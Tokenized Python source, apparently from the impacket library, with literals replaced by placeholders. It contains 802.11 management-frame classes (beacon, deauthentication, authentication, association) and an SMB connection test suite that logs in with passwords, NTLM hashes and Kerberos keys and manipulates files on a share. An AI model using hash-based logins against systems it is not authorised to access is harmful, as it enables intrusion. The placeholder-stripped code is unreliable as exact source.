DOT11_MANAGEMENT_ELEMENTS . SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> class Dot11ManagementProbeResponse ( Dot11ManagementBeacon ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> Dot11ManagementBeacon . __init__ ( self , aBuffer ) <EOL> class DOT11_REASON_CODES ( ) : <EOL> UNSPECIFIED_REASON = <NUM_LIT:1> <EOL> PREV_AUTH_NO_LONGER_VALID = <NUM_LIT:2> <EOL> DEAUTH_STA_IS_LEAVING = <NUM_LIT:3> <EOL> DISASS_DUE_TO_INACTIVITY = <NUM_LIT:4> <EOL> DISASS_AP_UNABLE_HANDLE_ALL_STA = <NUM_LIT:5> <EOL> C2_FRAME_FROM_NONAUTHENTICATED_STA = <NUM_LIT:6> <EOL> C3_FRAME_FROM_NONASSOCIATED_STA = <NUM_LIT:7> <EOL> DISSASS_STA_IS_LEAVING = <NUM_LIT:8> <EOL> STA_REQ_NOT_AUTH_STA = <NUM_LIT:9> <EOL> DISASS_POWER_CAP_IE_UNNACCEPTABLE = <NUM_LIT:10> <EOL> DISASS_SUP_CH_IE_UNNACCEPTABLE = <NUM_LIT:11> <EOL> INVALID_IE = <NUM_LIT> <EOL> MIC_FAILURE = <NUM_LIT> <EOL> FOUR_WAY_HANDSHAKE_TIMEOUT = <NUM_LIT:15> <EOL> GROUP_KEY_HANDSHAKE_TIMEOUT = <NUM_LIT:16> <EOL> IE_FOUR_WAY_HANDSHAKE_DIFFERENT = <NUM_LIT> <EOL> INVALID_GROUP_CIPHER = <NUM_LIT> <EOL> INVALID_PAIRWISE_CIPHER = <NUM_LIT> <EOL> INVALID_AKMP = <NUM_LIT:20> <EOL> UNSUPPORTED_RSN_IE_VERSION = <NUM_LIT> <EOL> INVALID_RSN_IE_CAP = <NUM_LIT> <EOL> X_AUTH_FAILED = <NUM_LIT> <EOL> CIPHER_SUITE_REJECTED_SECURITY_POLICY = <NUM_LIT> <EOL> DISASS_QOS_RELATED_REASON = <NUM_LIT:32> <EOL> DISASS_QOS_UNSUFFICIENT_BANDWIDTH = <NUM_LIT> <EOL> DISASS_EXCESSIVE_FRAMES_WITHOUT_ACK = <NUM_LIT> <EOL> DISASS_STA_TX_OUTSIDE_TXOPS = <NUM_LIT> <EOL> REQ_STA_LEAVING = <NUM_LIT> <EOL> REQ_STA_NOT_WANT_MECHANISM = <NUM_LIT> <EOL> REQ_STA_RECV_FRAMES_WHICH_SETUP_REQ = <NUM_LIT> <EOL> REQ_STA_DUE_TIMEOUT = <NUM_LIT> <EOL> STA_NOT_SUPPORT_CIPHER_SUITE = <NUM_LIT> <EOL> class Dot11ManagementDeauthentication ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:2> <EOL> tail_size = <NUM_LIT:0> <EOL> if aBuffer : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . load_packet ( aBuffer ) <EOL> else : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> def get_reason_code ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> def set_reason_code ( self , rc ) : <EOL> self . header . set_word ( <NUM_LIT:0> , rc , "<STR_LIT:<>" ) <EOL> class DOT11_AUTH_ALGORITHMS ( ) : <EOL> OPEN = <NUM_LIT:0> <EOL> SHARED_KEY = <NUM_LIT:1> <EOL> class DOT11_AUTH_STATUS_CODES ( ) : <EOL> SUCCESSFUL = <NUM_LIT:0> <EOL> UNSPECIFIED_FAILURE = <NUM_LIT:1> <EOL> CAP_REQ_UNSUPPORTED = <NUM_LIT:10> <EOL> REASS_DENIED_CANNOT_CONFIRM_ASS_EXISTS = <NUM_LIT:11> <EOL> ASS_DENIED_REASON_OUTSIDE_SCOPE_STANDARD = <NUM_LIT:12> <EOL> STA_NOT_SUPPORT_AUTH_ALGORITHM = <NUM_LIT> <EOL> AUTH_SEQ_OUT_OF_EXPECTED = <NUM_LIT> <EOL> AUTH_REJECTED_CHALLENGE_FAILURE = <NUM_LIT:15> <EOL> AUTH_REJECTED_TIMEOUT = <NUM_LIT:16> <EOL> ASS_DENIED_AP_UNABLE_HANDLE_MORE_STA = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_DATA_RATES = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_SHORT_PREAMBLE = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_PBCC_MODULATION = <NUM_LIT:20> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_CHANNEL_AGILITY = <NUM_LIT> <EOL> ASS_REQUEST_REJECTED_SPACTRUM_MGT_CAP = <NUM_LIT> <EOL> ASS_REQUEST_REJECTED_POWER_CAP_IE_UNNACCEPTABLE = <NUM_LIT> <EOL> ASS_REQUEST_REJECTED_SUP_CH_IE_UNNACCEPTABLE = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_SHORT_SLOT_TIME = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_DSSS_OFDM = <NUM_LIT> <EOL> UNSPECIFIED_QOS = <NUM_LIT:32> <EOL> ASS_DENIED_QOS_UNSUFFICIENT_BANDWIDTH = <NUM_LIT> <EOL> ASS_DENIED_EXCESSIVE_FRAME_LOST = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORT_QOS = <NUM_LIT> <EOL> REQ_HAS_BEEN_DECLINED = <NUM_LIT> <EOL> REQ_NOT_SUCCESSFUL_PARAM_INVALID_VALUE = <NUM_LIT> <EOL> TSPEC = <NUM_LIT> <EOL> INVALID_IE = <NUM_LIT> <EOL> INVALID_GROUP_CIPHER = <NUM_LIT> <EOL> INVALID_PAIRWISE_CIPHER = <NUM_LIT> <EOL> INVALID_AKMP = <NUM_LIT> <EOL> UNSUPPORTED_RSN_IE_VERSION = <NUM_LIT> <EOL> INVALID_RSN_IE_CAP = <NUM_LIT> <EOL> CIPHER_SUITE_REJECTED_SECURITY_POLICY = <NUM_LIT> <EOL> TS_NOT_CREATED = <NUM_LIT> <EOL> DIRECT_LINK_NOT_ALLOWED_BSS_POLICY = <NUM_LIT> <EOL> DST_STA_NOT_PRESENT_IN_BSS = <NUM_LIT> <EOL> DST_STA_NOT_QOS_STA = <NUM_LIT:50> <EOL> ASS_DENIED_LISTEN_INTERVAL_TOO_LARGE = <NUM_LIT> <EOL> class Dot11ManagementAuthentication ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:6> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_authentication_algorithm ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> def set_authentication_algorithm ( self , algorithm ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:0> , algorithm , "<STR_LIT:<>" ) <EOL> def get_authentication_sequence ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> def set_authentication_sequence ( self , seq ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:2> , seq , "<STR_LIT:<>" ) <EOL> def get_authentication_status ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:4> , "<STR_LIT:<>" ) <EOL> def set_authentication_status ( self , status ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:4> , status , "<STR_LIT:<>" ) <EOL> def get_challenge_text ( self ) : <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . CHALLENGE_TEXT ) <EOL> def set_challenge_text ( self , challenge ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . CHALLENGE_TEXT , challenge ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementDisassociation ( Dot11ManagementDeauthentication ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> Dot11ManagementDeauthentication . __init__ ( self , aBuffer ) <EOL> class Dot11ManagementAssociationRequest ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:4> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_listen_interval ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_listen_interval ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , value , "<STR_LIT:<>" ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_rsn ( self ) : <EOL> "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . RSN ) <EOL> if s is None : <EOL> return None <EOL> return s <EOL> def set_rsn ( self , data ) : <EOL> "<STR_LIT>" <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . RSN , data ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementAssociationResponse ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:6> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_status_code ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_status_code ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , value , "<STR_LIT:<>" ) <EOL> def get_association_id ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:4> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_association_id ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:4> , value , "<STR_LIT:<>" ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementReassociationRequest ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:10> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_listen_interval ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_listen_interval ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , value , "<STR_LIT:<>" ) <EOL> def get_current_ap ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:4> : <NUM_LIT:10> ] <EOL> def set_current_ap ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:4> + i , value [ i ] ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_rsn ( self ) : <EOL> "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . RSN ) <EOL> if s is None : <EOL> return None <EOL> return s <EOL> def set_rsn ( self , data ) : <EOL> "<STR_LIT>" <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . RSN , data ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementReassociationResponse ( Dot11ManagementAssociationResponse ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> Dot11ManagementAssociationResponse . __init__ ( self , aBuffer ) </s>
<s> import unittest <EOL> import os <EOL> import ConfigParser <EOL> from binascii import unhexlify <EOL> from impacket . smbconnection import SMBConnection , smb <EOL> from impacket . smb3structs import * <EOL> class SMBTests ( unittest . TestCase ) : <EOL> def create_connection ( self ) : <EOL> if self . dialects == smb . SMB_DIALECT : <EOL> s = SMBConnection ( '<STR_LIT>' , self . machine , preferredDialect = self . dialects , manualNegotiate = True ) <EOL> s . negotiateSession ( self . dialects , flags2 = self . flags2 ) <EOL> else : <EOL> s = SMBConnection ( '<STR_LIT>' , self . machine , preferredDialect = self . dialects ) <EOL> return s <EOL> def test_connectTree ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> tid = smb . connectTree ( self . share ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> def test_connection ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None ) ) <EOL> smb . logoff ( ) <EOL> del ( smb ) <EOL> def test_manualNego ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . negotiateSession ( self . dialects ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None ) ) <EOL> smb . logoff ( ) <EOL> del ( smb ) <EOL> def test_loginHashes ( self ) : <EOL> lmhash , nthash = self . hashes . split ( '<STR_LIT::>' ) <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , '<STR_LIT>' , self . domain , lmhash , nthash ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , '<STR_LIT>' , self . domain , unhexlify ( lmhash ) , unhexlify ( nthash ) , '<STR_LIT>' , None , None ) ) <EOL> smb . logoff ( ) <EOL> def test_loginKerberosHashes ( self ) : <EOL> lmhash , nthash = self . hashes . split ( '<STR_LIT::>' ) <EOL> smb = self . create_connection ( ) <EOL> smb . kerberosLogin ( self . username , '<STR_LIT>' , self . domain , lmhash , nthash , '<STR_LIT>' ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , '<STR_LIT>' , self . domain , unhexlify ( lmhash ) , unhexlify ( nthash ) , '<STR_LIT>' , None , None ) ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> smb . logoff ( ) <EOL> def test_loginKerberos ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . kerberosLogin ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None ) ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> smb . logoff ( ) <EOL> def test_loginKerberosAES ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . kerberosLogin ( self . username , '<STR_LIT>' , self . domain , '<STR_LIT>' , '<STR_LIT>' , self . aesKey ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , '<STR_LIT>' , self . domain , '<STR_LIT>' , '<STR_LIT>' , self . aesKey , None , None ) ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> smb . logoff ( ) <EOL> def test_listPath ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . listPath ( self . share , '<STR_LIT:*>' ) <EOL> smb . logoff ( ) <EOL> def test_createFile ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> tid = smb . connectTree ( self . share ) <EOL> fid = smb . createFile ( tid , self . file ) <EOL> smb . closeFile ( tid , fid ) <EOL> smb . rename ( self . share , self . file , self . file + '<STR_LIT>' ) <EOL> smb . deleteFile ( self . share , self . file + '<STR_LIT>' ) <EOL> smb . disconnectTree ( tid ) <EOL> smb . logoff ( ) <EOL> def test_readwriteFile ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> tid = smb . connectTree ( self . share ) <EOL> fid = smb . createFile ( tid , self . file ) <EOL> smb . writeFile ( tid , fid , "<STR_LIT:A>" * <NUM_LIT> ) <EOL> finished = False <EOL> data = '<STR_LIT>' <EOL> offset = <NUM_LIT:0> <EOL> remaining = <NUM_LIT> <EOL> while remaining > <NUM_LIT:0> : <EOL> data += smb . readFile ( tid , fid , offset , remaining ) <EOL> remaining = <NUM_LIT> - len ( data ) <EOL> self . assertTrue ( len ( data ) == <NUM_LIT> ) <EOL> self . assertTrue ( data == "<STR_LIT:A>" * <NUM_LIT> ) <EOL> smb . closeFile ( tid , fid ) <EOL> fid = smb . openFile ( tid , self . file ) <EOL> smb . closeFile ( tid , fid ) <EOL> smb . deleteFile ( self . share , self . file ) <EOL> smb . disconnectTree ( tid ) <EOL> smb . logoff ( ) <EOL> def test_createdeleteDirectory ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . createDirectory ( self . share , self . directory ) <EOL> smb . deleteDirectory ( self . share , self . directory ) <EOL> smb . logoff ( ) <EOL> def test_getData ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . getDialect ( ) <EOL> smb . getServerName ( ) <EOL> smb . getRemoteHost ( ) <EOL> smb . getServerDomain ( ) <EOL> smb . getServerOS ( ) <EOL> smb . doesSupportNTLMv2 ( ) <EOL> smb . isLoginRequired ( ) <EOL> smb . logoff ( ) <EOL> def test_getServerName ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> serverName = smb . getServerName ( ) <EOL> self . assertTrue ( serverName . upper ( ) == self . serverName . upper ( ) ) <EOL> smb . logoff ( ) <EOL> def test_getServerDNSDomainName ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> serverDomain = smb . getServerDNSDomainName ( ) <EOL> self . assertTrue ( serverDomain . upper ( ) == self . domain . upper ( ) ) <EOL> smb . logoff ( ) <EOL> def test_getServerDomain ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> serverDomain = smb . getServerDomain ( ) <EOL> self . assertTrue ( serverDomain . upper ( ) == self . domain . upper ( ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ) <EOL> smb . logoff ( ) <EOL> def test_getRemoteHost ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> remoteHost = smb . getRemoteHost ( ) <EOL> self . assertTrue ( remoteHost 